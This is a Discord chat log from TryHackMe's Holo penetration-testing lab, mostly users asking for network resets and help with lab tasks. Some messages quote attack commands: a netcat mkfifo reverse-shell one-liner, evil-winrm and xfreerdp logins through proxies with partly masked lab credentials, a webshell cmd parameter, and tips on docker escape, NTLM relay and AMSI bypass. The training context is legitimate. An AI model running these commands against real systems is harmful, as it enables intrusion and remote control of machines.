#holo-network

1 messages Β· Page 1 of 1 (latest)

iron galleon
#

GG

dry onyx
#

holo colo

heady cairn
#

Hey all -- I just started working through this network on stream. For those interested, here's the first video where I work through the first 13 tasks. If anyone is stuck or would like to follow along, I hope you find this helpful. I'll be completing the full network so feel free to follow along on YouTube πŸ™‚
https://youtu.be/4ue2Kc0cdlQ

In this video, we begin a brand-new network and start working through the "Holo" network on TryHackMe. This is an Active Directory (AD) and Web-App attack lab that aims to teach core web attack vectors and more advanced AD attack techniques. This network simulates an external penetration test on a corporate network.

In this first video, we co...

β–Ά Play video
analog snow
#

ehh, holo is rated with a Difficulty: hard not medium

heady cairn
#

Well shoot, my google image skills need to up their game πŸ˜†

#

I'll fix that, thanks for the catch

steel prawn
heady cairn
steel prawn
# heady cairn Hey!! Really appreciate the kind words!

Definitively some really great questions on that interview, it really helped in getting to know more of the mindset of interviewed, and not just the work/hacking-related type questions. You should bring more people on, cof 0day cof

steel prawn
#

I m getting this error using ntlmrelayx, any ideas?

civic obsidian
#

in task 19 when you want to escape the docker container, even if you caught a shell or not, the IP of L-SRV01 changed from (10.200.114.33) to (192.168.100.1)!!!
which causes it to be unconnectable from outside. Any solutions?

steel prawn
#

If I remember, the docker was public, but the docker host is in the internal network

#

Or you can also use chisel and proxychains

civic obsidian
quaint holly
#

can i get a reset on .95

#

network please

quaint holly
#

the dashboard pageis refusing to load

agile wind
#

can someone guide me please

#

i'm trying to learn some C2 and i have some questions regarding spawning an agent for the .31 host via the .33

quaint holly
#

what do i do

quaint holly
#

okay now im getting annoyed

shadow path
#

Is the .114 network working correctly? I can't seem to reach port 80 on .114.31 even from the comprised Linux machine
Can someone reset 114?

quaint holly
#

is the .111 sub down? i cant ping .111.30

zenith delta
#

Can somebody explain me why I cant find subdomains with gobuster.

iron galleon
#

maybe gobuster is not designed to find subdomains

zenith delta
iron galleon
#

maybe try wfuzz Β―_(ツ)_/Β―

zenith delta
iron galleon
#

not done any networks so no idea

zenith delta
#

If anybody know solution, I would appreciate it. I am unable to solve this for 2 hours 😦

#

Holo Network is up, so idk

#

Also tried wfuzz but same..

quaint holly
#

which sub are you on?

zenith delta
quaint holly
#

subnet

#

im having issues as well. i cant ping the DC or connect to websites

zenith delta
#

10.200.155.30 is Domain controller

quaint holly
#

ahhh

#

im .111

#

host file is correct too

zenith delta
quaint holly
#

yeh

zenith delta
# quaint holly

because I dont have that file and I saw in walkthrough that some guy also changed that folder

quaint holly
#

/etc/hosts

zenith delta
#

And I didnt. So maybe thats the reason it doesnt work for me

zenith delta
quaint holly
#

DC1

#

idk what im doing but the .111 subnet is not responding to pings, nmap scans or wont show when i put it in hosrs

zenith delta
#

Nmap worked for me. I scanned L-SRV01 with this" range sudo nmap -sV -sC -p- -v 10.200.155.0/24"

#

but gobuster doesnt work for me

#

But after adding IP to /etc/hosts file I get other error

zenith delta
#

port 80 not open

#

should be open

#

it's the wordpress ip that ends in 33

#

scanned 4 times

#

port 80

#

nothing

#

waiting for a reset

idle tree
#

Hey y'all. I'm trying to set up a general testing environment for windows security. I see a bunch of sources out there but can't tell if I can trust em. Can anyone recommend where I can grab a legit copy that isn't the eval version? Preferably server 2019 <

idle tree
#

nvm, figured it out

quiet raft
idle tree
#

Looks like the network is down again. waiting for a reset as well

quiet raft
idle tree
quiet raft
#

#infosec-general
You're not entitled to an answer though. Everyone here is a volunteer.

idle tree
frigid nacelle
zenith delta
#

Does somebody know why gobuster cant find dev.holo.live subdomain. I am doing dir scan... And I am getting following error:

#

holo.live is fine, I can do vhost scan (obviously bcs I found dev domain) and I can visit webpage on web browser

#

Is dev.holo.live subdomain down?

quaint holly
#

do you have it added to hosts>

zenith delta
#

oh, yes

#

10.200.155.33 holo.live,dev.holo.live,admin.holo.live

#

is my /etc/hosts file

zenith delta
#

how should I write it?

#

is it hard to write in discord chat?

zenith delta
#

I found solution, thanks!

hollow steepleBOT
#

Gave +1 Rep to @unreal hemlock

zenith delta
zenith delta
#

Hey

#

Does somebody know why suddenly admin login page on admin.holo.live is loading permanently after I inserted correct login credentials? It worked few minutes ago till I downloaded payload from python3 server that I am hosting, ran command via URL and got "10.200.155.XX - Command shell session 25 closed." on msfconsole

zenith delta
unborn siren
#

let's hack it)

zenith delta
zenith delta
#

What about you?

zenith delta
# unborn siren i got shell

I came to part where I need to escape container (TASK 18). Suddenly webbrowser froze and I now can't login xd

#

Funny room

unborn siren
#

i'm in task 16

zenith delta
#

Can you access holo.live?

unborn siren
zenith delta
#

Tried that

#

I am running Kali VM for hacking this room

#

But still..

#

Could you try access holo.live

unborn siren
#

i have to all subdomain

#

dev.holo.live too

#

for me all works

zenith delta
#

I can access dev.holo.live too

#

But cant holo.live

#

And cant login in admin dashboard

unborn siren
#

i couldn't login in admin yesterday. But now all works. Maybe you can try to get access later?

zenith delta
unborn siren
#

maybe it will help you

zenith delta
#

But thank you, anyway πŸ™‚

unborn siren
#

You are welcome!

zenith delta
#

Does you L-SRV01 have internal IP address. Because till my problem appeared, I had external IP address 10.50.155.33. Now its like this

unborn siren
#

i have the same ip addresses

zenith delta
unborn siren
#

yep

zenith delta
#

192.168.100.1

#

wow

unborn siren
#

you changed /etc/hosts

#

to current ip adress?

zenith delta
#

Restarted NetworkManager and still doesnt work

unborn siren
zenith delta
unborn siren
#

in my /etc/hosts i have the following IP address
10.200.95.33

#

can you try it?

halcyon trellis
#

Hello everyone!
If some body could help : in task 28, we have to give ```
What page does the reset redirect you to when successfully authenticated on S-SRV01?

I'm providing the name but it does not accept it..
any idea?
zenith delta
#

My is 10.200.155.33

#

I mean, it was

#

Now its 192.168.100.1

#

But thats wrong one

unborn siren
#

my was 10.200.95.33

#

but now ip 192.168.100.1 and i didn't change my /etc/hosts and everything works

zenith delta
#

Idk at all what is happening but nvm

#

Thanks anyway! πŸ™‚

halcyon trellis
#

in task 28, they are asking about this page aren't they? (I blurred some part so no spoiling)

split saffron
#

I have a problem in Task13 to generate reverse shell. I found the place to put the command but when I try in the browser with rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.50.108.41 4444 >/tmp/f the nc doest not reach the target.

#

I also try to encode the url with burp suit

unborn siren
#

I have the problem in Task 20 with privilege escalation
when i use docker suid privilege escalation it output Unable to find image 'alpine:latest' locally or
the input device is not a TTY
if i don't stable shell.
What's the problem?

unborn siren
#

should help

zenith delta
unborn siren
#

@unreal hemlock if stabilize it says Unable to find image alpine:latest locally

#

@unreal hemlock i stabilize by python3 pty and export and then background it and run stty fg and so on

stray pike
#

hi

halcyon trellis
hollow steepleBOT
#

Gave +1 Rep to @unborn siren

split saffron
#

web server are not working so much is it possible to reset ?

unborn siren
#

i tried again to privilege escalation but it didn't help

#

didn't help

#

oops

#

finally. bling bling

#

thank you

hollow steepleBOT
#

Gave +1 Rep to @unreal hemlock

halcyon trellis
#

I just tried ||reset.php|| and it worked, I was trying ||home.php||

halcyon trellis
#

Hello,

Did anyone succeeded with covenant (either powershell or HTTPGrunt)? I've been on it since yesterday with no luck (Idk if I should stick to the plan or switch to metasploit).

Thanks for your advise.

Right now I'm getting :

Illegal characters in path.
   at System.Security.Permissions.FileIOPermission.EmulateFileIOPermissionChecks(String fullPath)
   at System.Security.Permissions.FileIOPermission.QuickDemand(FileIOPermissionAccess access, String fullPath, Boolean checkForDuplicates, Boolean needFullPath)
   at System.Net.WebClient.GetUri(String path)
   at System.Net.WebClient.UploadString(String address, String data)
   at GruntStager.GruntStager.ExecuteStager()

with default tempates and the modified ones (when testing locally)

#

I see, I always had issues with Covenant ... but I gave it a chance this time again πŸ™‚ thank you so much, will move on then!

hollow steepleBOT
#

Gave +1 Rep to @unreal hemlock

halcyon trellis
#

Hello!

For task 36, my understanding is that we will have the right to winRM for ||PC-FILESRV01|| using the account we found earlier ||watamet||.
In the text we read : If successfully authenticated, you should now have a working WinRM shell that you can use to execute remote commands.
it means that should work.

unfortunately I get a permission error, either using the account password or its hash.

$ proxychains -q -f proxychains-1081.conf evil-winrm -i 10.200.112.35 -u w****t -p '**********'
Evil-WinRM shell v3.3

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1

I tried also winrs from S-SRV01 with the same permissions issue.

PS : I'm sure about password as I used it to RDP to S-SRV01

Anyone can help please?

unborn siren
#

Hello
I'm in Task 29. I want to catch traffic by BurpSuit. In browser i have access to S-SRV01 by foxyproxy. Foxyproxy use 1080 port and because of it i have access. So in BurpSuite i changed port to 1080 for catch traffic but it gives error that some program or process use this port. When i want use forxyproxy port 8080 that burpsuite can catch but if i use 8080 port i don't have access to site S-SRV01. How i can catch traffic by BurpSuite?

quiet raft
unborn siren
quiet raft
#

Proxy host is wrong. Destination host is wrong. Proxy port is wrong.

#

Essentially every field except "enabled"

unborn siren
hollow steepleBOT
#

Gave +1 Rep to @quiet raft

viscid musk
#

Holo seems to be stuck in a "loading" loop for me (loading tasks). I haven't joined the room yet. Anybody else having the same issue?

tardy idol
#

Network 10.200.107.0/24 is screwed up need help resetting it plz

sonic mesa
#

Hey all, I'm currently doing the AMSI bypass. When I run amsitrigger against one of the ps scripts I get no results - is it because I'm running Commando VM?

sonic mesa
#

Yeah, is amsitrigger just bumping the file up against windows defender to check for failures?

#

For some reason I thought it was doing something independently. I'll install a clean VM for it I suppose πŸ˜„

sonic mesa
#

Is there an issue with server? It's showing as running but no boxes responding 😦

halcyon trellis
sonic mesa
#

10.200.114 for me and no response from anything.

halcyon trellis
sonic mesa
#

I am 1 of 4 haha. Task 43 too so nearly done with the box.

halcyon trellis
halcyon trellis
#

Hello everyone!

I finished the room and wanted to share some points, to have your feedback and eventually help others;

As far as I know :

  • the WinRM PTH does not work, as user does not have the right to do it;
  • the DLL hijacking does not work, as the scheduled task to run the script ||execute.ps1|| that simulates an admin running the vulnerable binary does not exist on the server;
  • SMB relay did not work for me in the intended way, but I did it another way. May be I'm missing something;
  • Covenant does not seam to work (?)

if anyone can correct me I'll be thankful (because this means I will learn something).

night widget
#

whenever i try to download my .ovpn file it downloads an empty file, anyone know how i can fix this?

quiet raft
night widget
kind birch
night widget
kind birch
kind birch
night widget
kind birch
kind birch
split saffron
#

The web server is pretty instable it is not possible to get a reverse. Is there a backdoor to do the task 16 or after directly ?

charred zodiac
#

Hey guys, quick question, how long is access granted to holo and if time expires can you start again. Thanks

charred zodiac
hollow steepleBOT
#

Gave +1 Rep to @quiet raft

kind birch
split saffron
#

The host 10.200.111.30 is not attainable.

grave rose
#

the host is down

noble mist
#

Hello,
Does the dll hijacking works for the others?

#

didn't work for me

livid shoal
#

yes it does

quiet raft
#

There's many instances of holo, you need to specify which one you're on.

quiet raft
#

That is not how holo works.
Staff can't reset it, and you need to be patient. Discord staff especially can't do anything.

sage pine
#

Gang

zenith delta
#

skill issue

quiet raft
#

Discord staff aren't here to help you with networks.

#

Don't ping me for this

#

I can't.

unique plinth
vital locust
#

The Halo network openvpn file size is 0 bytes when downloaded and it won't connect. I contacted support a week ago but they still did not come up with the solution. They post an update every 2-3 days and asks one question and wait another 3 days to reply. Very disappointed with the customer service.

unique plinth
vital locust
zenith delta
#

I can't escalate my privileges. The error is the input device is not a TTY.

boreal coral
#

I'm having a problem on scanning the first target L-SRV01

#

I can't connect to the port 80 web server

#

seems to be broken

hollow linden
#

did a double take there for a second

indigo linden
#

I have the same issue right now but with holo live

plucky vale
#

Γ£nybody having problems with vpn's thm on holo?

lone spruce
#

Sorry I’m only seeing this now. Is it resolved? If not you can try regenerating and if it occurs again please let me know

nocturne sand
#

yeah. with these kind of rooms that need their own vpn files you will have to regularly delete your old file, regenerate the file and connect back

#

its the same with the wreath room

#

im having problems fuzzing the parameter for the admin room

#

i don't know why its not finding the parameter with FUZZ

#

same error when i put :FUZZ at the end of the wordlist.

nocturne sand
#

anyone?

nocturne sand
#

I could do the parameter fuzz with owasp zap but I can't get it to work with ffuf.

lone spruce
nocturne sand
#

i mean because a lot of people are doing those rooms and eventually it does come down

#

so i would say yeah, about once or twice a weak the room gets kind of messed up and I have to delete my old vpn file and regenerate a new one

#

don't redownload the same one. refresh the site, regenerate the vpn and re download it

lone spruce
#

There is no reason you should have to regenerate your vpn file. All your doing is putting yourself in a new subnet you’re not actually changing anything

nocturne sand
#

like right now the room seems messed up.

#

but i guess you're right about the vpn file for the holo network.

#

the reset is the best option but I have to wait a while to make my votes meet the requirement

velvet pendant
#

Hello, I seem to be having the same 404 issue when trying to download the holo openvpn config. I have tried multiple servers, multiple browsers, and the leave, logout, clear cache, rejoin trick. Any other suggestions?

thorn mirage
# nocturne sand

vote now if possible so we can reset. admin panel is not working

nocturne sand
#

i voted for yall

thorn mirage
#

It'd be great if a staff member could take a look at holo as it seems to be having issues. For the last 12 hours or so, I've been unable to reach DC-SRV01.

#

It seems the network has been reset at least once, i am for sure connected with the holo ovpn and my hosts file is updated.

#

@earnest hornet any way you can get someone to check this out? upvote

nocturne sand
#

nah it seems down right now

#

unable to connect but the pings go through

#

can't curl. says connection refrused

thorn mirage
nocturne sand
#

yeah its saying unable to connect for me

#

i can't connect to the original 10.200.110.33

thorn mirage
#

for sure. even if you use the ip right?.

#

yeah same

nocturne sand
#

or any of thelm

thorn mirage
#

for the past two days

nocturne sand
#

and it just got reset

#

i dont' get it

#

if you guys please vote

thorn mirage
#

for sure. i just started it. idk man.

nocturne sand
#

lets get another reset going

thorn mirage
#

hold on a sec dude

#

try to connect to 10.200.108.33

nocturne sand
#

i can't ping it

thorn mirage
#

its weird.

nocturne sand
#

the pings work for the starting website of www.holo.live but i just can't connect to it

#

my holo network shows that i'm connected

thorn mirage
#

so this ip for sure is not accessible. but i just tried .33 and it loaded.

nocturne sand
#

the last reset did not work i guess

thorn mirage
#

.33 is working for me even though it shows 10.200.108.30

thorn mirage
nocturne sand
#

sure

#

yeah its instantly going to unable to connect

#

its fried

fading seal
#

anyone know what's happening to the network? Can't access anything even though I'm connected to the vpn

azure lantern
#

I'm probably really dumb - but I can NOT stabilize the shell in task 14 (which you need to complete task 17, I believe). Whenever I bring it back from being suspended, it goes into this weird terminal that you CAN'T get out of unless you click on the X in the top right of the window. What in the world am I doing wrong?

quiet raft
#

Are you doing the stty -raw and fg method?

azure lantern
#

And the syntax for the python command is wrong - it's supposed to read "python3"

quiet raft
#

Are you on recent kali AKA zsh?

azure lantern
#

yes, I'm doing those commands. yes, I'm on the most recent kali. I didn't realize it was zsh. so, I need to do the one-liner I assume?

quiet raft
#

Either way, the stty and fg need to be in one command spaced with a semicolon

azure lantern
#

I'll give that a shot - thanks!

#

ugh - i think someone did something to the "dashboard.php" file, because it's just stuck now 😦

azure lantern
#

it's back πŸ™‚

zenith delta
#

Hello, I'm at Task 4 and have no idea what to do. I am a newbie. Can i start with the holo network or should i do all the learning path first?

spare beacon
#

If you have no idea what you're doing, probably do some rooms and then Wreath.

#

Then Holo.

finite tinsel
#

Is the Holo network having issues again? It's showing as "Resetting" for like half an hour now...

soft egret
#

I was having issues with Holo yesterday - nmap couldn't detect any host on any IP or port. Couldn't ping anything either.

tranquil raptor
#

Hi,
Why is the network always has issue? Starting the network after stopped state I'am not able to reach the targets and it always happens.
If the solution is resting pls hit the reset button, thank you.

fathom inlet
#

Hi,

#

i have issues as well "Network state: Resetting" since yesterday

finite tinsel
#

it is showing "Network state: Resetting" for weeks now. I can't start or stop anything (reset button doesn't work either), but the hosts are reachable.

stiff vessel
#

Mysql server is broken. Can someone reset the network pls

#

Or can people vote for it to be reset and stuff Pls 😎

bronze wigeon
stiff vessel
#

yea I just dont really want to wait 3 hours 🀣 cus I wanted to finish this today. Looks like I might have to though

bronze wigeon
stiff vessel
#

I wonder how many others are on it with me rn πŸ€” I'm guessing theres a limit of like 4/5 people or something

quiet raft
stiff vessel
#

Its at 4/5 now and I only have to wait like 20 mins don't worry about it mate πŸ‘

stiff vessel
#

Ok after a reset it is still not working

#

I must be doing something wrong here

#

This is the correct command, right?

#

Sorry some context

#

I'm on task 17

#

trying to connect to the remote mysql server

#

so I can then go on to escape the docker container (task 18)

stiff vessel
#

I'm on 111 btw

quiet raft
stiff vessel
#

o rly

#

my bad

#

I mean the server not my client or whatever

#

I was being an idiot. Doing something wrong.

#

apologies to anyone

marble blade
#

Hi, I'm unable to login to the administrator domain with the given creds
Plus the network state is just stuck at resetting with 4/5 resets

#

Can't do anything

sour falcon
#

I am having the same issue since at least 2 days now:

  • Subnet 95: 10.200.95.0/24
  • Network State: Resetting
  • Network up time: -
  • Start, Extend and Reset Buttons are greyed and cannot be used.
#

Any way to reset the network? I mean properly reset it...

rigid carbon
#

I am unable to download the hololive vpn configuration file.

rigid carbon
iron galleon
rigid carbon
#

I already tried regenrating configuration file but no benifits.

#

I already completed holo before but just wanna brush up few things.

iron galleon
#

the leave and rejoin of the room will not change your progress but might still help you get a working vpn file

rigid carbon
lone spruce
tough tundra
#

how long usually it takes to reset ?

tough tundra
#

dont care the status and continue

#

oh thank you

tough tundra
#

wait wut?? πŸ˜‚

sour falcon
#

I found the credentials but I cannot login to the admin dashboard of holo.live... it keeps showing me the login page... Is there any problem with it?

iron galleon
hearty thunder
#

Holo room isn't working

ive regenerated my ovpn file yet i can't still access it

hearty thunder
#

@lone spruce

#

I can't access holo

#

its been 1hr now

#

since i've been trying to access it

hearty thunder
#

@ionic tinsel

#

Its been about 2hrs now i can't still access holo network

abstract sage
#

i Found credential but cannot login

#

Holo room work ?

upbeat ledge
abstract sage
#

im vote reset

autumn raft
#

cant download holo vpn

#

get a 404 error

tough tundra
#

Ded networkπŸ˜„

abstract sage
#

Can anyone let me know holo network can stil work ?

tough tundra
#

its partially working but idk

sage pine
#

Is Holo still down?

cold narwhal
#

Is Holo down? Network seems up for more than 10 minutes but L-SRV01 is not responding.

sterile patio
#

Holo is stuck at Network state: Resetting. Buttons to Start/Extend/Reset are greyed out. Can someone check (or reset) please?

sage pine
#

Is HOLO still down?

golden gyro
zenith delta
#

up and down and up and down... πŸ™‚

golden gyro
hasty scaffold
#

hey guys can anyone help ? I'm doing the nmap but somehow i manage to get only the .250 host and not the .33

#

nmap -sV -sC -p- 10.200.112.0/24

#

:/

hasty scaffold
#

is there any mod up ?

#

i can't see the host .33 up

#

only the .250

zenith delta
# hasty scaffold is there any mod up ?

Currently there are a few problems with HOLO. Just try again. I had the same problem yesterday when scanning the internal network with crackmapexec.
Since the reset I can no longer bring chisel on target .33 (no more space available - => / is using 99.8% of 7.69GB). 😦 I'll check back tomorrow.

zenith delta
hasty scaffold
hollow steepleBOT
#

Gave +1 Rep to @molten nova

zenith delta
#

Anyone have an idea how i could create some disk space here? └─$ ssh linux-admin@10.200.112.33 130 β¨―
linux-admin@10.200.112.33's password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-1030-aws x86_64)

System information as of Thu Dec 15 08:08:43 UTC 2022

System load: 0.01 Processes: 100
Usage of /: 99.8% of 7.69GB Users logged in: 0
Memory usage: 4% IPv4 address for eth0: 10.200.112.33
Swap usage: 0%

=> / is using 99.8% of 7.69GB If I want to upload chisel, but "No space left on device" 😦

hasty scaffold
#

So...yesterday using the nmap I only had the .250 host. Today I get the .33 too but the port 80 is not showing...what the fuck is wrong with this room lol

#

how am I supposed to train in this condition

zenith delta
golden gyro
primal tangle
#

hey is .33 up?

sage pine
#

I gave up

hot cipher
#

Hi,
When I run:
gobuster vhost -u http://holo.live -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 30
It doesn't find the three domains.
Any idea what I am doing wrong?

pallid gull
#

is your /etc/hosts set up correctly? I also used wfuzz
wfuzz -u holo.live -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.holo.live" --hh 21456

sharp robin
#

hi not sure why i got all hosts down when i did nmap on holo

#

anoything wrong w the system?

spark kayak
#

I'm having trouble with the 10.200.108.xx can a mod reset please

pallid gull
hot cipher
#

No

#

I don't access. I pressed the "Reset" button, but only 1/5

#

can someone help me with vote for reset?

#

I am using the Kali machine from your web and I don't have access

dire birch
dire birch
#

Made good progress. Was nearly broken out of the container when the network stopped working just before I could do the final curl command.

Now I can't ping anything and I guess have to start over.

I guess I'm vote 4 of 5 for a reset.

hot cipher
#

There is something I'm not I understand. Should I go over the tasks and hack or I supposed to go blind hack all the network and sometime to pick on the walkthrough?

hot cipher
#

The network was up and now it again down 😦

#

Does someone is looking over it ?

#

Ok I was able to reset it, let's see

#

still down

sharp robin
#

hi it's still the same

#

this is now on attack machine but it shows the same result too

hot cipher
#

5 hours ago when I started it was up and after 40-50 minutes it went down again

hot cipher
#

was up and down again

zenith talon
#

hi

#

trying to escape the container with any possible way im getting the error "the input device is not a TTY"

#

is that my reverse shell messed up?

#

and when trying to sudo, resulting in

#

sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper

pallid gull
# sharp robin hi it's still the same

You will only get ping returns from 7 IP addresses, one of which is the gateway. That's a lot of scanning up front with your command, would suggest a ping scan first, and then a more thorough portscan when you've found hosts that respond

#

that screenshot is accurate, in that the majority of the subnet is in fact unresponsive because there is nothing there

pallid gull
dire birch
dire birch
zenith talon
#

Thanks for the advice, eventually it was a different docker run command I found on stackoverflow that got my the root access, I probably messed up the first pivot shell

hot cipher
#

Anyone having issues with the Kali machine to use Burp? I don't have the HTTP History window, it's say it empty

#

why I can't upload images ?

sharp robin
#

β”Œβ”€β”€(kaliγ‰Ώkali)-[~]
└─$ nmap -Pn -sp 10.200.110.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-28 03:45 EST
Could not parse as a prefix nor find as a vendor substring the given --spoof-mac argument: 10.200.110.0/24. If you are giving hex digits, there must be an even number of them.
QUITTING!

#

but got the above.

#

then when i tried to add www.holo.live to /etc/hosts

#

like that below

#

but i cldn't get to the webpage

#

can someone help me

hot cipher
quiet raft
zenith talon
#

does anyone managed to downlaod sshuttle into the S-SRV01?

#

im getting unable to access git hub

#

and pat install also ends up with error

#

apt*

#

also i cant sudo as root 😦

pallid gull
zenith talon
#

maybe im confusing

#

its an ubuntu 20.04

pallid gull
#

L-SRV01 is the only Linux box on that network. You have to break out of the docker container and then crack the passwords. One of the accounts has wide-open sudo access to let you continue further

zenith talon
#

already did i have the pass and user also mayde sshkey persistence

#

but cant manage to brake free, as i want to use sshuttle

pallid gull
#

as for 'apt install', I would recommend you obtain the sshuttle binary on your Kali box, host it, and transfer it to L-Srv01 that way.

zenith talon
#

ill try that

#

thanks

neon frost
#

many people stuck here too

neon frost
#

what is task 15 want me to do

#

i'm very confuse

#

i passed now

#

how to fix if room bug ???

pallid gull
# neon frost what is task 15 want me to do

The room is not bugged - this is a new concept that requires some patience and experimentation to become familiar with exactly was is going on . It's not a typical CTF (even though there are flags), rather you are encountering 'layers' to a network. And the web services running on L-SRV01 are the first layer.

neon frost
#

I tried serveral times so I guess I need to reset instance

pallid gull
#

do you get any output from "admin.holo.live/dashboard.php?cmd=id"

neon frost
#

no

pallid gull
#

I just connected to the HoloLive network via VPN. Logged in to admin.holo.live using admin:DBxxxxxn! password, then browsed to admin.holo.live/dashboard.php?cmd=id, and received the output I was expecting.

neon frost
#

it should have 1 instance right why i can't normal login

#

XD

#

i will extends network and try again

neon frost
#

i just about cached in browser

#

bruh

ashen valve
#

for those of you how have troubles (like i had) with receiving incoming connection from NTLMrelayX(Task 47) use the version v0.9.22(i first tried with v0.10.1 without success) and BEFORE setting the port forward in Meterpreter make sure that you have set in proxychains config version 4 of SOCKS protocol(i had 5 set and it didn't received any communication)... be careful with these versions otherwise will not work. very nice room! thank you @lone spruce and thank you @daring fulcrum

hollow steepleBOT
#

Gave +1 Rep to @lone spruce

copper tangle
#

Is anyone's vpn connection to the network being weird

zenith talon
#

trying to get a shell from PC-FILESRV01 cant figure this out

#

got a webshell on S-SRV01

#

tried every shell i know and can connect, the wierd this is i can ping my machine from SRV01 and cannot ping from my machine to S-SRV01

zenith talon
#

smb client / winrm/ xfree rdp/ nothing can reach the filesrv

pallid gull
zenith talon
#

Thanks for the answer, and that what i intended to do, probelm was im having problem with the proxy which i cannot reach all the machines in the network...

pallid gull
#

i used chisel. Set up the socks5 connection. With xfreerdp you can supply the /proxy command line parameter: xfreerdp /log-level:OFF /w:1600 /h:1024 /v:10.200.110.35:3389 /proxy:socks5://localhost:1080 /d:hololive /u:waβ€”et /p:Nothβ€”rry!

rustic ivy
#

creds don't seem to work for admin.holo.live on the 10.200.95.x subnet. Anybody else have this issue?

zenith talon
#

Make sure you set up the proxy chain and chisel/port forwarding correctly

#

First off the other machine is windows therefore it’s shouldn’t work I think

hollow steepleBOT
#

Gave +1 Rep to @zenith talon

zenith talon
#

Yea I’m guessing it’s a problem with the room, I really tried every possible way 😦

#

Maybe chisel AND port forwarding as a tunnel between them?

zenith delta
#

is anyone experiencing connectivity issues in the 10.200.114 network?

zenith delta
#

on the filesrv, as i understand, there should be a user defined scheduled task?

prisma zinc
#

Same as a lot of people, i cant download the vpn file. 404 error.

zenith delta
#

leave/rejoin room?

prisma zinc
#

yes i tried that and it didnt work

#

an answer from the room-bugs channel :
"leave the room.... rejoin it.... go to download the vpn file... hit regen button... wait 5 min.... try download it... maybe tada"

zenith delta
red wedge
#

hi. I'm attempting authenticate to pc-filesrv01 host but 445 port is not open.

#

and reset button is disabled on this network. I can't continue to tasks.

pallid gull
red wedge
red wedge
hallow elk
#

for some reason ||dashboard.php|| is not loading, is anyone with this problem?

short wigeon
#

Port 80 is down for me

hallow elk
#

strange, tried to reset but It needs 5 votes

short wigeon
#

I reset it about 3 hours ago and ran a Nmap scan again and port 80 is down for some reason

hallow elk
#

My port 80 is fine, just the ||dashboard.php|| that is not loading, I don't know If I can ask for a staff to take a look

short wigeon
#

very strange

worn burrow
#

when I try to download the vpn config file it says it's lost in the matrix? SOLVED

rough panther
#

Any reason whenever I run ffuf or gobuster against ||holo.live|| I get errors? I added it to /etc/hosts already. I can load it up on firefox going to the domain and dirbuster it but whenever I run a nslookup it gives my the IP address to the public version of ||holo.live|| Im not sure how to troubleshoot this.

short wigeon
#

Same thing is happening with me when I am running gobuster. I even tried resetting and running gobuster with less threads, still the same. Not sure why

dull atlas
worn burrow
worn burrow
#

but it was being a nightmare after that too

short wigeon
#

Thanks for the info @worn burrow

hollow steepleBOT
#

Gave +1 Rep to @worn burrow

worn burrow
dull atlas
#

Thanks @worn burrow

hollow steepleBOT
#

Gave +1 Rep to @worn burrow

worn burrow
zenith delta
#

i cant reach holo network?can someone help?

worn burrow
zenith delta
#

yep, now i can reach but there are alot of vhosts

worn burrow
zenith delta
worn burrow
zenith delta
#

can some one help on holo network?

haughty prism
#

How long does it take to reset the lab? 😦

#

Unable to run initial scan 😭

normal jetty
#

I think you need to login first πŸ™‚

earnest hornet
zenith delta
#

I've never used a THM lab environment before. After 9 days, access is cutoff regardless of completion?

vestal furnace
#

Hm, Can't connect to the Network with the VPN, It kept giving me Restart pause
Left and rejoined and regenerated the vpn multiple times

#

Still same problem

vestal furnace
#

Update: VPN is working Now the problem is related to OPENVPN version. If you are using Latest version of Parrot OS and facing this problem, add the --data-ciphers AES-256-CBC to the holovpn file either at the beginning or ending

vestal furnace
#

can anyone reset or vote for reset the 109 subnet

brittle snow
#

If so, just did

vestal furnace
#

But thank you

brittle snow
#

maybe @pale plover or @earnest hornet

vestal furnace
#

I cant ping the machine, im in the middle of docker breakout and network time ranout, i restarted the machine since then i cant access it

earnest hornet
brittle snow
#

there is 13 mins left

#

Jabba knows everything about computers, now that he replied, it should work after 15 minutes

vestal furnace
earnest hornet
#

Not a problem, common misconception

#

I don’t have permission to manage the networks, but I’ll see what I can do

brittle snow
#

Jabba, who are the members that check and work on room bugs? Is it only the room creator for 'x' room?

brittle snow
#

Like Ninja? πŸ€“

quiet raft
zenith delta
#

its my 1st time am accessing Holo and its showing 9 days access left so i can't access holo after 9 days?

iron galleon
zenith delta
hollow steepleBOT
#

Gave +1 Rep to @iron galleon

vestal furnace
#

Task 35 AV Evasion Wrapping the burrito
can anyone help me
No matter which method i use i cant get the revershell

I tried to ping my attack machine from target box its pinging βœ”οΈ
I used the script in the task ❌
I used Nishang with simple php backdoor ❌
so far no luck

#

I even tried to get the revers shell on L-SRV01 from S-SRV01 that didnt work as well

vestal furnace
#

Well, I wasted my whole day on this so, I disabled AV and enabled it after i got the shell

candid zodiac
#

oh come on guys fix the issues with holo and wreath please

iron phoenix
#

Hey! Looking for some advice with domain resolution

#

I added holo.live to my /etc/hosts and the associated ip, however in my browser whenever I attempt to access it, it send me to www.holo.live instead

iron phoenix
#

Unfortunately have to agree with the majority of people in this chat, holo is not the best

#

I have a random connection to L-SVR01 that sometimes resolves, most of the time doesn't

iron phoenix
#

I added it to my /etc/hosts

#

keep getting that

iron phoenix
#

It only resolves when using the ip, can confirm

iron phoenix
#

Holo seems to be better now

#

Also was my fault, was using a comma to seperate hostnames lol

#

servers still sluggish/time out though

iron phoenix
#

The dashboard broke, F

inner jacinth
#

Hi all, In task 10

In a black box pentest, how find the hidden parameter example= on x.php. i.e x.php?example=

lone spruce
inner jacinth
teal forge
#

hi, for task 47, i'm not receivng a connection from dc to ntlmrelayx, i started it before i created the meterpreter tunnel, also im using the 0.9.22 version of ntlmrelyx, any ideas please?

pearl compass
#

Is there anything to observe at task 9? I am scanning for several hours now with gobuster, but don’t get any hits.

regal furnace
#

Hey guys, can I approach this room from a pure black box pentest perspective?

lone spruce
neon cove
#

task 19 cant exploit the docker suid binary cos i didn't stabile the shell? πŸ’€

#

need redo the attack chain from task 14

regal furnace
hollow steepleBOT
#

